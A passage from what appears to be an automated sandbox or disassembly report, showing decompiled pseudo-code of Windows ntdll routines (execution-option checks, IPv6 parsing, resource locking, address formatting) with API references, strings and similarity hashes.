                                    				intOrPtr _t56;
                                    				unsigned int _t62;
                                    				void* _t69;
                                    				void* _t70;
                                    				intOrPtr _t72;
                                    				signed int _t73;
                                    				void* _t74;
                                    				void* _t75;
                                    				void* _t76;
                                    				void* _t77;
                                    
                                    				_t33 =  *0x812088; // 0x777d6234
                                    				_v8 = _t33 ^ _t73;
                                    				_v548 = _v548 & 0x00000000;
                                    				_t72 = _a4;
                                    				if(E00767F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                    					__eflags = _v548;
                                    					if(_v548 == 0) {
                                    						goto L1;
                                    					}
                                    					_t62 = _t72 + 0x24;
                                    					E00783F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                    					_t71 = 0x214;
                                    					_v544 = 0x214;
                                    					E0073DFC0( &_v540, 0, 0x214);
                                    					_t75 = _t74 + 0x20;
                                    					_t46 =  *0x814218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                    					__eflags = _t46;
                                    					if(_t46 == 0) {
                                    						goto L1;
                                    					}
                                    					_t47 = _v544;
                                    					__eflags = _t47;
                                    					if(_t47 == 0) {
                                    						goto L1;
                                    					}
                                    					__eflags = _t47 - 0x214;
                                    					if(_t47 >= 0x214) {
                                    						goto L1;
                                    					}
                                    					_push(_t62);
                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                    					E00783F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                    					_t52 = E00740D27( &_v540, L"Execute=1");
                                    					_t76 = _t75 + 0x1c;
                                    					_push(_t62);
                                    					__eflags = _t52;
                                    					if(_t52 == 0) {
                                    						E00783F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                    						_t71 =  &_v540;
                                    						_t56 = _t73 + _v544 - 0x218;
                                    						_t77 = _t76 + 0x14;
                                    						_v552 = _t56;
                                    						__eflags = _t71 - _t56;
                                    						if(_t71 >= _t56) {
                                    							goto L1;
                                    						} else {
                                    							goto L10;
                                    						}
                                    						while(1) {
                                    							L10:
                                    							_t62 = E00748375(_t71, 0x20);
                                    							_pop(_t69);
                                    							__eflags = _t62;
                                    							if(__eflags != 0) {
                                    								__eflags = 0;
                                    								 *_t62 = 0;
                                    							}
                                    							E00783F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                    							_t77 = _t77 + 0x10;
                                    							E007AE8DB(_t69, _t70, __eflags, _t72, _t71);
                                    							__eflags = _t62;
                                    							if(_t62 == 0) {
                                    								goto L1;
                                    							}
                                    							_t31 = _t62 + 2; // 0x2
                                    							_t71 = _t31;
                                    							__eflags = _t71 - _v552;
                                    							if(_t71 >= _v552) {
                                    								goto L1;
                                    							}
                                    						}
                                    					}
                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                    					_push(3);
                                    					_push(0x55);
                                    					E00783F92();
                                    					_t38 = 1;
                                    					L2:
                                    					return E0073E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                    				}
                                    				L1:
                                    				_t38 = 0;
                                    				goto L2;
                                    			}

                                    APIs
                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00783F12
                                    Strings
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00783F75
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0078E2FB
                                    • 4b}w, xrefs: 00767F08
                                    • Execute=1, xrefs: 00783F5E
                                    • ExecuteOptions, xrefs: 00783F04
                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00783F4A
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0078E345
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00783EC4
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: BaseDataModuleQuery
                                    • String ID: 4b}w$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 3901378454-236298059
                                    • Opcode ID: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                    • Instruction ID: 30286a2fc8b3622a829d088f6c0825a0d86035c3761885e44a4e3d126e91a33d
                                    • Opcode Fuzzy Hash: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                    • Instruction Fuzzy Hash: 2641AD7168061CFADB20AE54DCCAFDA73BCAF54714F000595B605E6092EB789B46CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00770B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				void* _t108;
                                    				void* _t116;
                                    				char _t120;
                                    				short _t121;
                                    				void* _t128;
                                    				intOrPtr* _t130;
                                    				char _t132;
                                    				short _t133;
                                    				intOrPtr _t141;
                                    				signed int _t156;
                                    				signed int _t174;
                                    				intOrPtr _t177;
                                    				intOrPtr* _t179;
                                    				intOrPtr _t180;
                                    				void* _t183;
                                    
                                    				_t179 = _a4;
                                    				_t141 =  *_t179;
                                    				_v16 = 0;
                                    				_v28 = 0;
                                    				_v8 = 0;
                                    				_v24 = 0;
                                    				_v12 = 0;
                                    				_v32 = 0;
                                    				_v20 = 0;
                                    				if(_t141 == 0) {
                                    					L41:
                                    					 *_a8 = _t179;
                                    					_t180 = _v24;
                                    					if(_t180 != 0) {
                                    						if(_t180 != 3) {
                                    							goto L6;
                                    						}
                                    						_v8 = _v8 + 1;
                                    					}
                                    					_t174 = _v32;
                                    					if(_t174 == 0) {
                                    						if(_v8 == 7) {
                                    							goto L43;
                                    						}
                                    						goto L6;
                                    					}
                                    					L43:
                                    					if(_v16 != 1) {
                                    						if(_v16 != 2) {
                                    							goto L6;
                                    						}
                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                    						L47:
                                    						if(_t174 != 0) {
                                    							E00748980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                    							_t116 = 8;
                                    							E0073DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                    						}
                                    						return 0;
                                    					}
                                    					if(_t180 != 0) {
                                    						if(_v12 > 3) {
                                    							goto L6;
                                    						}
                                    						_t120 = E00770CFA(_v28, 0, 0xa);
                                    						_t183 = _t183 + 0xc;
                                    						if(_t120 > 0xff) {
                                    							goto L6;
                                    						}
                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                    						goto L47;
                                    					}
                                    					if(_v12 > 4) {
                                    						goto L6;
                                    					}
                                    					_t121 = E00770CFA(_v28, _t180, 0x10);
                                    					_t183 = _t183 + 0xc;
                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                    					goto L47;
                                    				} else {
                                    					while(1) {
                                    						_t123 = _v16;
                                    						if(_t123 == 0) {
                                    							goto L7;
                                    						}
                                    						_t108 = _t123 - 1;
                                    						if(_t108 != 0) {
                                    							goto L1;
                                    						}
                                    						_t178 = _t141;
                                    						if(E007706BA(_t108, _t141) == 0 || _t135 == 0) {
                                    							if(E007706BA(_t135, _t178) == 0 || E00770A5B(_t136, _t178) == 0) {
                                    								if(_t141 != 0x3a) {
                                    									if(_t141 == 0x2e) {
                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                    											goto L41;
                                    										} else {
                                    											_v24 = _v24 + 1;
                                    											L27:
                                    											_v16 = _v16 & 0x00000000;
                                    											L28:
                                    											if(_v28 == 0) {
                                    												goto L20;
                                    											}
                                    											_t177 = _v24;
                                    											if(_t177 != 0) {
                                    												if(_v12 > 3) {
                                    													L6:
                                    													return 0xc000000d;
                                    												}
                                    												_t132 = E00770CFA(_v28, 0, 0xa);
                                    												_t183 = _t183 + 0xc;
                                    												if(_t132 > 0xff) {
                                    													goto L6;
                                    												}
                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                    												goto L20;
                                    											}
                                    											if(_v12 > 4) {
                                    												goto L6;
                                    											}
                                    											_t133 = E00770CFA(_v28, 0, 0x10);
                                    											_t183 = _t183 + 0xc;
                                    											_v20 = _v20 + 1;
                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                    											goto L20;
                                    										}
                                    									}
                                    									goto L41;
                                    								}
                                    								if(_v24 > 0 || _v8 > 6) {
                                    									goto L41;
                                    								} else {
                                    									_t130 = _t179 + 1;
                                    									if( *_t130 == _t141) {
                                    										if(_v32 != 0) {
                                    											goto L41;
                                    										}
                                    										_v32 = _v8 + 1;
                                    										_t156 = 2;
                                    										_v8 = _v8 + _t156;
                                    										L34:
                                    										_t179 = _t130;
                                    										_v16 = _t156;
                                    										goto L28;
                                    									}
                                    									_v8 = _v8 + 1;
                                    									goto L27;
                                    								}
                                    							} else {
                                    								_v12 = _v12 + 1;
                                    								if(_v24 > 0) {
                                    									goto L41;
                                    								}
                                    								_a7 = 1;
                                    								goto L20;
                                    							}
                                    						} else {
                                    							_v12 = _v12 + 1;
                                    							L20:
                                    							_t179 = _t179 + 1;
                                    							_t141 =  *_t179;
                                    							if(_t141 == 0) {
                                    								goto L41;
                                    							}
                                    							continue;
                                    						}
                                    						L7:
                                    						if(_t141 == 0x3a) {
                                    							if(_v24 > 0 || _v8 > 0) {
                                    								goto L41;
                                    							} else {
                                    								_t130 = _t179 + 1;
                                    								if( *_t130 != _t141) {
                                    									goto L41;
                                    								}
                                    								_v20 = _v20 + 1;
                                    								_t156 = 2;
                                    								_v32 = 1;
                                    								_v8 = _t156;
                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                    								goto L34;
                                    							}
                                    						}
                                    						L8:
                                    						if(_v8 > 7) {
                                    							goto L41;
                                    						}
                                    						_t142 = _t141;
                                    						if(E007706BA(_t123, _t141) == 0 || _t124 == 0) {
                                    							if(E007706BA(_t124, _t142) == 0 || E00770A5B(_t125, _t142) == 0 || _v24 > 0) {
                                    								goto L41;
                                    							} else {
                                    								_t128 = 1;
                                    								_a7 = 1;
                                    								_v28 = _t179;
                                    								_v16 = 1;
                                    								_v12 = 1;
                                    								L39:
                                    								if(_v16 == _t128) {
                                    									goto L20;
                                    								}
                                    								goto L28;
                                    							}
                                    						} else {
                                    							_a7 = 0;
                                    							_v28 = _t179;
                                    							_v16 = 1;
                                    							_v12 = 1;
                                    							goto L20;
                                    						}
                                    					}
                                    				}
                                    				L1:
                                    				_t123 = _t108 == 1;
                                    				if(_t108 == 1) {
                                    					goto L8;
                                    				}
                                    				_t128 = 1;
                                    				goto L39;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __fassign
                                    • String ID: .$:$:
                                    • API String ID: 3965848254-2308638275
                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction ID: d5d01b3d71e993e05c5a94f67dae0f804c7ecfa9f38d3ef88ee363e3ccdcc407
                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction Fuzzy Hash: 79A19D7190030AEFCF25CF64C8556FEB7B4AF15384F24C56AD84AA7282D6389A41CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 49%
                                    			E00770554(signed int _a4, char _a8) {
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int* _t49;
                                    				signed int _t51;
                                    				signed int _t56;
                                    				signed int _t58;
                                    				signed int _t61;
                                    				signed int _t63;
                                    				void* _t66;
                                    				intOrPtr _t67;
                                    				signed int _t70;
                                    				void* _t75;
                                    				signed int _t81;
                                    				signed int _t84;
                                    				void* _t86;
                                    				signed int _t93;
                                    				signed int _t96;
                                    				intOrPtr _t105;
                                    				signed int _t107;
                                    				void* _t110;
                                    				signed int _t115;
                                    				signed int* _t119;
                                    				void* _t125;
                                    				void* _t126;
                                    				signed int _t128;
                                    				signed int _t130;
                                    				signed int _t138;
                                    				signed int _t144;
                                    				void* _t158;
                                    				void* _t159;
                                    				void* _t160;
                                    
                                    				_t96 = _a4;
                                    				_t115 =  *(_t96 + 0x28);
                                    				_push(_t138);
                                    				if(_t115 < 0) {
                                    					_t105 =  *[fs:0x18];
                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                    						goto L6;
                                    					} else {
                                    						__eflags = _t115 | 0xffffffff;
                                    						asm("lock xadd [eax], edx");
                                    						return 1;
                                    					}
                                    				} else {
                                    					L6:
                                    					_push(_t128);
                                    					while(1) {
                                    						L7:
                                    						__eflags = _t115;
                                    						if(_t115 >= 0) {
                                    							break;
                                    						}
                                    						__eflags = _a8;
                                    						if(_a8 == 0) {
                                    							__eflags = 0;
                                    							return 0;
                                    						} else {
                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                    							_t49 = _t96 + 0x1c;
                                    							_t106 = 1;
                                    							asm("lock xadd [edx], ecx");
                                    							_t115 =  *(_t96 + 0x28);
                                    							__eflags = _t115;
                                    							if(_t115 < 0) {
                                    								L23:
                                    								_t130 = 0;
                                    								__eflags = 0;
                                    								while(1) {
                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                    									asm("sbb esi, esi");
                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008101c0;
                                    									_push(_t144);
                                    									_push(0);
                                    									_t51 = E0072F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                    									__eflags = _t51 - 0x102;
                                    									if(_t51 != 0x102) {
                                    										break;
                                    									}
                                    									_t106 =  *(_t144 + 4);
                                    									_t126 =  *_t144;
                                    									_t86 = E00774FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                    									_push(_t126);
                                    									_push(_t86);
                                    									E00783F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                    									E00783F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                    									_t130 = _t130 + 1;
                                    									_t160 = _t158 + 0x28;
                                    									__eflags = _t130 - 2;
                                    									if(__eflags > 0) {
                                    										E007B217A(_t106, __eflags, _t96);
                                    									}
                                    									_push("RTL: Re-Waiting\n");
                                    									_push(0);
                                    									_push(0x65);
                                    									E00783F92();
                                    									_t158 = _t160 + 0xc;
                                    								}
                                    								__eflags = _t51;
                                    								if(__eflags < 0) {
                                    									_push(_t51);
                                    									E00773915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                    									asm("int3");
                                    									while(1) {
                                    										L32:
                                    										__eflags = _a8;
                                    										if(_a8 == 0) {
                                    											break;
                                    										}
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                    										_t119 = _t96 + 0x24;
                                    										_t107 = 1;
                                    										asm("lock xadd [eax], ecx");
                                    										_t56 =  *(_t96 + 0x28);
                                    										_a4 = _t56;
                                    										__eflags = _t56;
                                    										if(_t56 != 0) {
                                    											L40:
                                    											_t128 = 0;
                                    											__eflags = 0;
                                    											while(1) {
                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                    												asm("sbb esi, esi");
                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008101c0;
                                    												_push(_t138);
                                    												_push(0);
                                    												_t58 = E0072F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                    												__eflags = _t58 - 0x102;
                                    												if(_t58 != 0x102) {
                                    													break;
                                    												}
                                    												_t107 =  *(_t138 + 4);
                                    												_t125 =  *_t138;
                                    												_t75 = E00774FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                    												_push(_t125);
                                    												_push(_t75);
                                    												E00783F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                    												E00783F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                    												_t128 = _t128 + 1;
                                    												_t159 = _t158 + 0x28;
                                    												__eflags = _t128 - 2;
                                    												if(__eflags > 0) {
                                    													E007B217A(_t107, __eflags, _t96);
                                    												}
                                    												_push("RTL: Re-Waiting\n");
                                    												_push(0);
                                    												_push(0x65);
                                    												E00783F92();
                                    												_t158 = _t159 + 0xc;
                                    											}
                                    											__eflags = _t58;
                                    											if(__eflags < 0) {
                                    												_push(_t58);
                                    												E00773915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                    												asm("int3");
                                    												_t61 =  *_t107;
                                    												 *_t107 = 0;
                                    												__eflags = _t61;
                                    												if(_t61 == 0) {
                                    													L1:
                                    													_t63 = E00755384(_t138 + 0x24);
                                    													if(_t63 != 0) {
                                    														goto L52;
                                    													} else {
                                    														goto L2;
                                    													}
                                    												} else {
                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                    													_push( &_a4);
                                    													_push(_t61);
                                    													_t70 = E0072F970( *((intOrPtr*)(_t138 + 0x18)));
                                    													__eflags = _t70;
                                    													if(__eflags >= 0) {
                                    														goto L1;
                                    													} else {
                                    														_push(_t70);
                                    														E00773915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                    														L52:
                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                    														_push( &_a4);
                                    														_push(1);
                                    														_t63 = E0072F970( *((intOrPtr*)(_t138 + 0x20)));
                                    														__eflags = _t63;
                                    														if(__eflags >= 0) {
                                    															L2:
                                    															return _t63;
                                    														} else {
                                    															_push(_t63);
                                    															E00773915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                    															_push( &_a4);
                                    															_push(1);
                                    															_t63 = E0072F970( *((intOrPtr*)(_t138 + 0x20)));
                                    															__eflags = _t63;
                                    															if(__eflags >= 0) {
                                    																goto L2;
                                    															} else {
                                    																_push(_t63);
                                    																_t66 = E00773915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                    																asm("int3");
                                    																while(1) {
                                    																	_t110 = _t66;
                                    																	__eflags = _t66 - 1;
                                    																	if(_t66 != 1) {
                                    																		break;
                                    																	}
                                    																	_t128 = _t128 | 0xffffffff;
                                    																	_t66 = _t110;
                                    																	asm("lock cmpxchg [ebx], edi");
                                    																	__eflags = _t66 - _t110;
                                    																	if(_t66 != _t110) {
                                    																		continue;
                                    																	} else {
                                    																		_t67 =  *[fs:0x18];
                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                    																		return _t67;
                                    																	}
                                    																	goto L58;
                                    																}
                                    																E00755329(_t110, _t138);
                                    																return E007553A5(_t138, 1);
                                    															}
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												_t56 =  *(_t96 + 0x28);
                                    												goto L3;
                                    											}
                                    										} else {
                                    											_t107 =  *_t119;
                                    											__eflags = _t107;
                                    											if(__eflags > 0) {
                                    												while(1) {
                                    													_t81 = _t107;
                                    													asm("lock cmpxchg [edi], esi");
                                    													__eflags = _t81 - _t107;
                                    													if(_t81 == _t107) {
                                    														break;
                                    													}
                                    													_t107 = _t81;
                                    													__eflags = _t81;
                                    													if(_t81 > 0) {
                                    														continue;
                                    													}
                                    													break;
                                    												}
                                    												_t56 = _a4;
                                    												__eflags = _t107;
                                    											}
                                    											if(__eflags != 0) {
                                    												while(1) {
                                    													L3:
                                    													__eflags = _t56;
                                    													if(_t56 != 0) {
                                    														goto L32;
                                    													}
                                    													_t107 = _t107 | 0xffffffff;
                                    													_t56 = 0;
                                    													asm("lock cmpxchg [edx], ecx");
                                    													__eflags = 0;
                                    													if(0 != 0) {
                                    														continue;
                                    													} else {
                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                    														return 1;
                                    													}
                                    													goto L58;
                                    												}
                                    												continue;
                                    											} else {
                                    												goto L40;
                                    											}
                                    										}
                                    										goto L58;
                                    									}
                                    									__eflags = 0;
                                    									return 0;
                                    								} else {
                                    									_t115 =  *(_t96 + 0x28);
                                    									continue;
                                    								}
                                    							} else {
                                    								_t106 =  *_t49;
                                    								__eflags = _t106;
                                    								if(__eflags > 0) {
                                    									while(1) {
                                    										_t93 = _t106;
                                    										asm("lock cmpxchg [edi], esi");
                                    										__eflags = _t93 - _t106;
                                    										if(_t93 == _t106) {
                                    											break;
                                    										}
                                    										_t106 = _t93;
                                    										__eflags = _t93;
                                    										if(_t93 > 0) {
                                    											continue;
                                    										}
                                    										break;
                                    									}
                                    									__eflags = _t106;
                                    								}
                                    								if(__eflags != 0) {
                                    									continue;
                                    								} else {
                                    									goto L23;
                                    								}
                                    							}
                                    						}
                                    						goto L58;
                                    					}
                                    					_t84 = _t115;
                                    					asm("lock cmpxchg [esi], ecx");
                                    					__eflags = _t84 - _t115;
                                    					if(_t84 != _t115) {
                                    						_t115 = _t84;
                                    						goto L7;
                                    					} else {
                                    						return 1;
                                    					}
                                    				}
                                    				L58:
                                    			}
                                    0x007921c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007921c4
                                    0x007921c6
                                    0x007921c6
                                    0x007921c8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007921c8
                                    0x007921a2
                                    0x00000000
                                    0x00792183
                                    0x0077057b
                                    0x0077057d
                                    0x00770581
                                    0x00770583
                                    0x00792178
                                    0x00000000
                                    0x00770589
                                    0x0077058f
                                    0x0077058f
                                    0x00770583
                                    0x00000000

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792206
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-4236105082
                                    • Opcode ID: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                    • Instruction ID: fbe174005d69523103c40687462872883b2a849454bbf419938160b7b3bbf122
                                    • Opcode Fuzzy Hash: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                    • Instruction Fuzzy Hash: AD514B75740205BBEF14EB18DC85FA673A9AF94710F218229FD48DB287D969EC4287D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E007714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                    				signed int _v8;
                                    				char _v10;
                                    				char _v140;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t24;
                                    				void* _t26;
                                    				signed int _t29;
                                    				signed int _t34;
                                    				signed int _t40;
                                    				intOrPtr _t45;
                                    				void* _t51;
                                    				intOrPtr* _t52;
                                    				void* _t54;
                                    				signed int _t57;
                                    				void* _t58;
                                    
                                    				_t51 = __edx;
                                    				_t24 =  *0x812088; // 0x777d6234
                                    				_v8 = _t24 ^ _t57;
                                    				_t45 = _a16;
                                    				_t53 = _a4;
                                    				_t52 = _a20;
                                    				if(_a4 == 0 || _t52 == 0) {
                                    					L10:
                                    					_t26 = 0xc000000d;
                                    				} else {
                                    					if(_t45 == 0) {
                                    						if( *_t52 == _t45) {
                                    							goto L3;
                                    						} else {
                                    							goto L10;
                                    						}
                                    					} else {
                                    						L3:
                                    						_t28 =  &_v140;
                                    						if(_a12 != 0) {
                                    							_push("[");
                                    							_push(0x41);
                                    							_push( &_v140);
                                    							_t29 = E00767707();
                                    							_t58 = _t58 + 0xc;
                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                    						}
                                    						_t54 = E007713CB(_t53, _t28);
                                    						if(_a8 != 0) {
                                    							_t34 = E00767707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                    							_t58 = _t58 + 0x10;
                                    							_t54 = _t54 + _t34 * 2;
                                    						}
                                    						if(_a12 != 0) {
                                    							_t40 = E00767707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                    							_t58 = _t58 + 0x10;
                                    							_t54 = _t54 + _t40 * 2;
                                    						}
                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                    						 *_t52 = _t53;
                                    						if( *_t52 < _t53) {
                                    							goto L10;
                                    						} else {
                                    							E00732340(_t45,  &_v140, _t53 + _t53);
                                    							_t26 = 0;
                                    						}
                                    					}
                                    				}
                                    				return E0073E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                    			}





















                                    APIs
                                    • ___swprintf_l.LIBCMT ref: 0079EA22
                                      • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 0077146B
                                      • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 00771490
                                    • ___swprintf_l.LIBCMT ref: 0077156D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$4b}w$]:%u
                                    • API String ID: 48624451-3920738116
                                    • Opcode ID: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                    • Instruction ID: d3a778ee60efaa949fd91bc014b9dfe59e3c424b9fb95e479ac8a1f065700a8e
                                    • Opcode Fuzzy Hash: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                    • Instruction Fuzzy Hash: F721C1B29006199BDF24DE68DC45AEE73ACEB50740F848151FD4AD3141EB78AA688BE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E007553A5(signed int _a4, char _a8) {
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t32;
